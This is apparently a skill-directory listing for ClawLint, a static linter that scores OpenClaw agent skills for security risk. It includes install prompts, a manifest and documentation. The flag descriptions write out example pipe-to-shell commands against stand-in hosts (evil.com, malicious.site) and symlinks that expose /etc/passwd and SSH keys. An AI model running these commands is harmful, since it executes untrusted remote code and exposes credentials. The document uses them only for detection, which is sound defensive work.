# Send Claw-lint to your agent
Hand the extracted package to your coding agent with a concrete install brief instead of figuring it out manually.
## Fast path
- Download the package from Yavira.
- Extract it into a folder your agent can access.
- Paste one of the prompts below and point your agent at the extracted folder.
## Suggested prompts
### New install

```text
I downloaded a skill package from Yavira. Read SKILL.md from the extracted folder and install it by following the included instructions. Tell me what you changed and call out any manual steps you could not complete.
```
### Upgrade existing

```text
I downloaded an updated skill package from Yavira. Read SKILL.md from the extracted folder, compare it with my current installation, and upgrade it while preserving any custom configuration unless the package docs explicitly say otherwise. Summarize what changed and any follow-up checks I should run.
```
## Machine-readable fields
```json
{
  "schemaVersion": "1.0",
  "item": {
    "slug": "claw-lint",
    "name": "Claw-lint",
    "source": "tencent",
    "type": "skill",
    "category": "安全合规",
    "sourceUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint",
    "canonicalUrl": "https://clawhub.ai/ParthGhumatkar/claw-lint",
    "targetPlatform": "OpenClaw"
  },
  "install": {
    "downloadUrl": "/downloads/claw-lint",
    "sourceDownloadUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=claw-lint",
    "sourcePlatform": "tencent",
    "targetPlatform": "OpenClaw",
    "packageFormat": "ZIP package",
    "primaryDoc": "SKILL.md",
    "includedAssets": [
      ".gitignore",
      "SKILL.md",
      "bin/claw-lint.sh"
    ],
    "downloadMode": "redirect",
    "sourceHealth": {
      "source": "tencent",
      "slug": "claw-lint",
      "status": "healthy",
      "reason": "direct_download_ok",
      "recommendedAction": "download",
      "checkedAt": "2026-04-29T03:11:54.018Z",
      "expiresAt": "2026-05-06T03:11:54.018Z",
      "httpStatus": 200,
      "finalUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=claw-lint",
      "contentType": "application/zip",
      "probeMethod": "head",
      "details": {
        "probeUrl": "https://wry-manatee-359.convex.site/api/v1/download?slug=claw-lint",
        "contentDisposition": "attachment; filename=\"claw-lint-1.0.4.zip\"",
        "redirectLocation": null,
        "bodySnippet": null,
        "slug": "claw-lint"
      },
      "scope": "item",
      "summary": "Item download looks usable.",
      "detail": "Yavira can redirect you to the upstream package for this item.",
      "primaryActionLabel": "Download for OpenClaw",
      "primaryActionHref": "/downloads/claw-lint"
    },
    "validation": {
      "installChecklist": [
        "Use the Yavira download entry.",
        "Review SKILL.md after the package is downloaded.",
        "Confirm the extracted package contains the expected setup assets."
      ],
      "postInstallChecks": [
        "Confirm the extracted package includes the expected docs or setup files.",
        "Validate the skill or prompts are available in your target agent workspace.",
        "Capture any manual follow-up steps the agent could not complete."
      ]
    }
  },
  "links": {
    "detailUrl": "https://openagent3.xyz/skills/claw-lint",
    "downloadUrl": "https://openagent3.xyz/downloads/claw-lint",
    "agentUrl": "https://openagent3.xyz/skills/claw-lint/agent",
    "manifestUrl": "https://openagent3.xyz/skills/claw-lint/agent.json",
    "briefUrl": "https://openagent3.xyz/skills/claw-lint/agent.md"
  }
}
```
## Documentation

### ClawLint

Security linter for OpenClaw skills

Runs a local audit over your installed OpenClaw skills without executing any code. Scans both workspace (~/.openclaw/workspace/skills) and system (~/.openclaw/skills) directories.

With 7.1% of ClawHub skills containing security flaws, ClawLint provides pre-execution defense by identifying malicious patterns before they run.

### Summary

ClawLint audits OpenClaw skills for security threats without executing code. It detects malicious patterns like remote execution, credential theft, and backdoors, then assigns risk scores (0-100) and generates SHA256 hashes for integrity monitoring. Outputs JSON for automation and CI/CD pipelines.

### What It Does

Risk scoring — assigns a numeric risk score (0-100) based on detected patterns
Audit flags — identifies suspicious behaviors (remote execution, secret access, etc.)
Inventory mode — optional SHA256 hashing of all files for change detection
JSON output — machine-readable results (requires Python 3)
No execution — static analysis only, safe to run on untrusted skills

### Scan all skills (summary view)

{baseDir}/bin/claw-lint.sh

### Scan one specific skill

{baseDir}/bin/claw-lint.sh --skill <skill-name>

Example: {baseDir}/bin/claw-lint.sh --skill hashnode-publisher

### Full inventory with SHA256 hashes

{baseDir}/bin/claw-lint.sh --full --skill <skill-name>

### JSON output (requires Python 3)

{baseDir}/bin/claw-lint.sh --format json

### Options

FlagDescription--skill <name>Scan only the specified skill--fullInclude SHA256 inventory of all files--format jsonOutput as JSON (needs python3)--min-score <N>Show only skills with risk score ≥ N--strictPrioritize high-severity patterns--max-bytes <N>Skip files larger than N bytes (default: 2MB)

### Risk Score

0-30: Low risk (common patterns, minimal concerns)
31-60: Medium risk (network access, file operations)
61-100: High risk (remote execution, credential access, system tampering)

### Common Flags

pipes_remote_to_shell — downloads and executes remote code
downloads_remote_content — fetches external files
has_executables — contains binary files
uses_ssh_or_scp — SSH/SCP operations
contains_symlinks — symbolic links present

### Example Output

SCORE  SKILL                FILES  SIZE     FLAGS
-----  -----                -----  ----     -----
57     hashnode-publisher   2      1.1KB    downloads_remote_content,pipes_remote_to_shell
45     ec2-health-monitor   2      1.9KB    pipes_remote_to_shell

### Risk Scoring Details

ClawLint assigns risk scores from 0 (safe) to 100 (critical) based on pattern detection:

Score RangeClassificationDescription0-20Low RiskStandard file operations, no suspicious patterns21-50Medium RiskNetwork calls or external dependencies detected51-80High RiskMultiple suspicious patterns or obfuscation detected81-100CriticalRemote execution, secret access, or privilege escalation

### Scoring Factors

+25 points: Remote execution patterns (curl | bash, wget -O-, nc)
+30 points: Secret/credential access (~/.openclaw/credentials, ~/.ssh/)
+20 points: Privilege escalation (sudo, setuid, chmod +s)
+15 points: Code obfuscation (base64 decode, eval, exec in suspicious contexts)
+10 points: External network calls (curl, wget, http requests)
+10 points: File system operations outside skill directory
+5 points: Use of /tmp or world-writable directories

### pipes_remote_to_shell

Downloads and executes external code without verification.

Examples:

curl https://evil.com/script.sh | bash
wget -O- https://malicious.site/payload | sh

Risk: Critical. Remote code execution vector for malware.

### downloads_remote_content

Fetches external files or data from the internet.

Examples:

curl -O https://example.com/file.tar.gz
wget https://cdn.example.com/data.json

Risk: Medium-High. Potential supply chain attack or data exfiltration.

### has_executables

Contains compiled binary files (not shell scripts).

Examples:

ELF binaries
Compiled programs

Risk: Medium. Harder to audit, may contain hidden functionality.

### uses_ssh_or_scp

Performs SSH/SCP operations.

Examples:

ssh user@remote.host "command"
scp file.txt user@remote:/path/

Risk: Medium. Potential for unauthorized remote access or data transfer.

### contains_symlinks

Includes symbolic links that may point outside skill directory.

Examples:

ln -s /etc/passwd exposed_file
ln -s ~/.ssh/id_rsa key_link

Risk: Low-Medium. May expose sensitive files or create confusion.

### Requirements

Bash 4.0+
Standard Unix tools: find, grep, awk, sha256sum, stat
Python 3 (optional, for JSON output only)

Works on Ubuntu/Debian without sudo. Designed for EC2 and similar environments.

### Why Use This?

Audit skills before installation
Detect backdoors or malicious patterns in community skills
Track changes to installed skills with SHA256 inventory
Enforce security policies in automated pipelines

### Terminal Output (Default)

Human-readable table format with color-coded risk scores (when terminal supports colors).

### JSON Output (--format json)

Machine-readable structure for integration with CI/CD pipelines:

{
  "scan_date": "2026-02-13T14:50:00Z",
  "skills_scanned": 12,
  "high_risk_count": 2,
  "results": [
    {
      "skill_name": "hashnode-publisher",
      "risk_score": 57,
      "file_count": 2,
      "total_size": "1.1KB",
      "flags": ["downloads_remote_content", "pipes_remote_to_shell"],
      "files": [
        {
          "path": "bin/publish.sh",
          "sha256": "a1b2c3d4...",
          "size": 896
        }
      ]
    }
  ]
}

### Regular Audits

Run ClawLint after installing or updating skills:

{baseDir}/bin/claw-lint.sh --min-score 50

### Baseline Inventory

Create a security baseline for production environments:

{baseDir}/bin/claw-lint.sh --full --format json > baseline.json

Re-run periodically and diff against baseline to detect tampering.

### CI/CD Integration

Add to your deployment pipeline:

# Fail build if any skill scores above 60
{baseDir}/bin/claw-lint.sh --format json | python3 -c "
import json, sys
data = json.load(sys.stdin)
high_risk = [s for s in data['results'] if s['risk_score'] > 60]
if high_risk:
    print(f'❌ {len(high_risk)} high-risk skills detected')
    sys.exit(1)
"

### Whitelist Trusted Skills

For known-safe skills with legitimate flags, document exceptions:

# Example: hashnode-publisher needs network access
{baseDir}/bin/claw-lint.sh --skill hashnode-publisher
# Expected score: 45-60 (downloads_remote_content is legitimate)

### Limitations

Static analysis only — cannot detect runtime behavior or dynamically generated code
Pattern-based — may have false positives for legitimate use cases
No sandbox — does not execute or test skills
Local files only — scans installed skills, not ClawHub packages before install

For comprehensive security, combine ClawLint with:

Manual code review for critical skills
VirusTotal scanning for executables
Runtime monitoring and sandboxing
Regular security updates

### Contributing

Report false positives or suggest new detection patterns at the OpenClaw security repository.

### License

MIT License - Free to use, modify, and distribute.
## Trust
- Source: tencent
- Verification: Indexed source record
- Publisher: ParthGhumatkar
- Version: 1.0.4
## Source health
- Status: healthy
- Item download looks usable.
- Yavira can redirect you to the upstream package for this item.
- Health scope: item
- Reason: direct_download_ok
- Checked at: 2026-04-29T03:11:54.018Z
- Expires at: 2026-05-06T03:11:54.018Z
- Recommended action: Download for OpenClaw
## Links
- [Detail page](https://openagent3.xyz/skills/claw-lint)
- [Send to Agent page](https://openagent3.xyz/skills/claw-lint/agent)
- [JSON manifest](https://openagent3.xyz/skills/claw-lint/agent.json)
- [Markdown brief](https://openagent3.xyz/skills/claw-lint/agent.md)
- [Download page](https://openagent3.xyz/downloads/claw-lint)